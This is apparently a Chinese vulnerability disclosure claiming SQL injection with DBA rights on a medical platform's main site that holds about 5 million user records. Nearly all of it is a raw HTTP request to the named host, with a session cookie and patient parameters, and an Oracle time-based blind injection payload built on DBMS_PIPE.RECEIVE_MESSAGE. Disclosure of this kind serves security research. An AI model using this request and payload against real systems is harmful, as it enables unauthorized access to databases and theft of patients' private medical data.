智慧医疗安全之云信医疗主站SQL注入/DBA权限/涉及近500W+用户数据

GET http://www.jkwin.com.cn/ystpatient2.3/callR.do?functionName=doJsonp_f4bc5edb_8efe_4724_9b24_62ce7b52b552&method=getQuery&patientId=1&patientName=%E8%8B%8F%E8%81%94&true=doJsonp_f4bc5edb_8efe_4724_9b24_62ce7b52b552&_=1465190257502 HTTP/1.1
 Cookie: JSESSIONID=CA4098C775A2CD02446CDF0EA8DA1777
 User-Agent: Mozilla/5.0
 X-Requested-With: XMLHttpRequest
 Referer: http://www.jkwin.com.cn/ystpatient2.3/callR.do?method=getQuery&true=doJsonp_f4bc5edb_8efe_4724_9b24_62ce7b52b552&patientId=5577546766&patientName=%E8%8B%8F%E8%81%94&functionName=doJsonp_f4bc5edb_8efe_4724_9b24_62ce7b52b552&_=1465190257502
 Host: www.jkwin.com.cn
 Connection: Keep-alive
 Accept-Encoding: gzip,deflate
 Accept: */*

1' AND 2452=DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(102)||CHR(98)||CHR(108),3) AND 'UisK'='UisK